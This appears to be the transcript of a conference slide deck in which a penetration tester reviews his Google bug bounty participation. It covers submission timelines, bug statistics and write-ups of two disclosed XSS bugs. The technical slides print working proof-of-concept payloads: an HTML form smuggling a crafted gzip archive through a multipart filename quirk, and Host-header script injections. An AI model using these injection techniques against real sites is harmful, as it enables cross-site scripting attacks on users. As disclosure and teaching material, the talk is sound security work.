Google Bug Bounty - Michał Bentkowski

Is it worth it or just a waste of time?
GoogleBugBounty

http://bentkowski.info/q About Google Bug Bounty - is it worth it
or just a waste of time • Michał Bentkowski • Pentester @ securitum.pl • IT security interests: • Client-side issues. • Browser quirks, • Top 10 Google VRP reporters in 2014 • Social: • Blog: blog.bentkowski.info • @SecurityMB • sekurak.pl (PL)

http://bentkowski.info/q PresentationPlan Google Bug Bounty - is it worth it
or just a waste of time? • Organisational • What’s bug bounty all about, • Why bug bounty? Why Google? • Bug submission process, • Bug statistics • Technical • „Lucky” bug • XSS via ﬁle upload, • XSS via Host header

http://bentkowski.info/q Questions… Google Bug Bounty - is it worth it
or just a waste of time • Major hearing loss :( • Please ask questions at http://bentkowski.info/q • Question time at the end of the presentation

OrganisationalStuff

http://bentkowski.info/q AboutBounties Google Bug Bounty - is it worth it
or just a waste of time • Deal between companies and security researchers, • Lots of bug bounty programs, • Google Vulnerability Reward Program (VRP) • https://www.google.pl/about/appsecurity/reward-program/

http://bentkowski.info/q LittleHistory Google Bug Bounty - is it worth it
or just a waste of time • Started doing bounties in 2013 • Chosen Google: • Good reputation • Good payments

http://bentkowski.info/q BugSubmission Google Bug Bounty - is it worth it
or just a waste of time • http://goo.gl/vulnz/

http://bentkowski.info/q NiceCatch! Google Bug Bounty - is it worth it
or just a waste of time

http://bentkowski.info/q Timeline Google Bug Bounty - is it worth it
or just a waste of time • Usually 1-5 days to „Nice catch!” • Bounty conﬁrmation within another week (Wednesday morning) • Payment: 2-3 months

http://bentkowski.info/q SomeStatistics Google Bug Bounty - is it worth it
or just a waste of time 0 1 2 3 4 5 6 7 8 9 10 2013 2014 2015

http://bentkowski.info/q SomeStatistics Google Bug Bounty - is it worth it
or just a waste of time Clickjacking 1 Path traversal 1 Cookie folding 1 RCE 1 CSRF 1 XSS 13

TechnicalStuff

http://bentkowski.info/q OutdatedSoftware Google Bug Bounty - is it worth it
or just a waste of time • QuickOfﬁce - mobile productivity suite • Acquired by Google in 2012 • Incorporated to Google Docs in 2014 • But they’re not dead…

http://bentkowski.info/q OutdatedSoftware Google Bug Bounty - is it worth it
or just a waste of time • issues.quickoffice.com and issues2.quickoffice.com hosted JIRA • https://confluence.atlassian.com/jira/jira-security- advisory-2014-02-26-445188412.html

http://bentkowski.info/q XSSviaFileUpload Google Bug Bounty - is it worth it
or just a waste of time • My favourite XSS • Postini Header Analyzer (http://www.google.com/postini/headeranalyzer) • Wikipedia: „Postini was an e-mail, Web security, and archiving service owned by Google since 2007. It provided cloud computing services for ﬁltering e-mail spam and malware (before it was delivered to a client's mail server), offered optional e-mail archiving, and protected client networks from web-borne malware.” X-pstn-levels: (S: 0.00000/60.95723 CV:99.9000 R:95.91080 P: 95.91081 M:64.93900 C:93.23770 ) X-pstn-settings: 5 (2.00000:8.00000) r p M c

or just a waste of time • But it’s XSS via upload form… • So always upload dialog box. • The attack scenario? • The attacker sends a maliciously crafted ZIP file to the victim • The attacker needs to lure the victim into the vulnerable page • The victim needs to click on the upload button, then MANUALLY select the file (s)he was given from the attacker, • The victim needs to confirm the upload

or just a waste of time • Can we make an upload in such a way that the server sees that as a ﬁle upload while it’s a typical POST form from the browser’s perspective?

or just a waste of time • This application actually splits the string on semicolon. • <input name="file_1; name=file_1; filename=test.zip; a"> • Content-disposition: form-data; name="file_1; name=file_1; filename=test.zip; a" name="file_1; name=file_1; filename=test.zip; a" name="file_1; name=file_1; filename=test.zip; a"

or just a waste of time • Chrome tried to interpret the data in some encoding. • Unknown byte sequence in that encoding? HTML entity that! • 0x00 - 0x9F - allowed bytes • Rest (0xA0 - 0xFF) - forbidden bytes (characters) • Problem with ZIP. Why not TAR?

or just a waste of time • GZIP Structure: • 10 bytes header, • Body - containing DEFLATE stream • 8 byte footer: CRC32 checksum and original ﬁle length • 10 bytes header - no forbidden characters • 8 byte footer - easy to get rid of forbidden characters, • Body? • https://github.com/molnarg/ascii-zip • „A deﬂate compressor that emits compressed data that is in the [A-Za-z0-9] ASCII byte range.”

or just a waste of time <html> <body> <form action="http://www.google.com/postini/headeranalyzer/" method="POST" enctype="multipart/form-data"> <input type="hidden" name="x; name=file_1; filename=abc.tar.gz; " id="vulnerable" value="" /> <input type="submit" value="XSS @ google.com" /> </form> <script> var tarfile = "\x1f\x8b \x08AAAAAAAD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAt33wWDtDDDtGDtswDDwG0stpDDtGwwDDwwD33333sw033333 gFPqImO\x7f[AWg{Wcs]c{KwoaYQ} HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHiiiueeAHiiiMuUAHi iiiyeAHiiiiiiiiiiuAYyeuYYeMEUuAiYeeuYHAiHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH_OocwHiiGSHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOockkHHHHHHHHHH HHHHHHHHHHHHHHHHHiiiiiiAHiiiiiiAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHHHHHHHHCKOoq\\HH...HHHH\x08df\x0e\x1a\x0b\x08\x00\x00"; var vuln = document.getElementById('vulnerable'); vuln.value = (tarfile); </script> </body> </html>

or just a waste of time https://www.youtube.com/watch?v=jiQOYGXxw14

or just a waste of time • Lessons learnt? • Always try to ﬁnd quirks in webservers, they may behave in a non-standard way. • When something doesn’t work in one browser, try in others.

http://bentkowski.info/q XSSviaHostHeader Google Bug Bounty - is it worth it
or just a waste of time • Known misbehaviour of Internet Explorer • Found by Sergey Bobrov (@black2fan) in 2013 • Found some quirk in Google parsing of Host header • Let the hunting begin!

or just a waste of time HTTP/1.1 302 Found Date: Fri, 06 Mar 2015 08:35:32 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.36-0+deb7u3 Location: http://example.com/login.php Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html

or just a waste of time HTTP/1.1 302 Found Date: Fri, 06 Mar 2015 08:35:32 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.36-0+deb7u3 Location: http://example.com%2Flogin.php Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html

or just a waste of time GET /login.phphp/ HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: pl-PL User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deﬂate Host: example.com/login.php DNT: 1 Connection: Keep-Alive Cache-Control: no-cache

or just a waste of time • Google Host header parsing • Host: www.google.com -> works • Host: www.google.com/test -> doesn’t work • Host: www.google.com:80 -> works • Host: www.google.com:80<anyting> -> also works!

or just a waste of time HTTP/1.1 302 Found Server: Apache/2.2.22 (Debian) Location: https://www.google.com%3a443%2fcse%2ftools %2fcreate_ontheﬂy%3b%3c%2ftextarea%3e%3cscript %3ealert(1)%3c%2fscript%3e Host: www.google.com:443/cse/tools/create_ontheﬂy;</ textarea><script>alert(1)</script>

or just a waste of time http://test.pl/<svg/onload=alert(1)/../../ http://test.pl/

or just a waste of time Location: https://www.google.com%3a443%2fcse%2ftools %2fcreate_ontheﬂy%3b%3c%2ftextarea%3e%3csvg%2fonload %3dalert%28document%2edomain%29%3e%3b%2f%2e%2e%2f%2e %2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e %2f%2e%2e%2f Host: www.google.com:443/cse/tools/create_ontheﬂy;</ textarea><svg/ onload=alert(document.domain)>;/../../../../../../../../../../../../. ./../

or just a waste of time https://www.youtube.com/watch?v=9A44ERoAFkc

or just a waste of time • Lessons learnt? • The same as before! Find on your own or learn about browser quirks, • Try to ﬁnd weaknesses in servers.

http://bentkowski.info/q Summary Google Bug Bounty - is it worth it
or just a waste of time • I really enjoy my participation in Google VRP, • Great way to enhance my skills as well as to get some money, • Learn about browsers, try to fuzz servers, • Be a bit lucky!

Questions? theEnd

Google Bug Bounty - Michał Bentkowski

Google Bug Bounty - Michał Bentkowski

More Decks by Tech Space guests

Other Decks in Technology

Featured

Transcript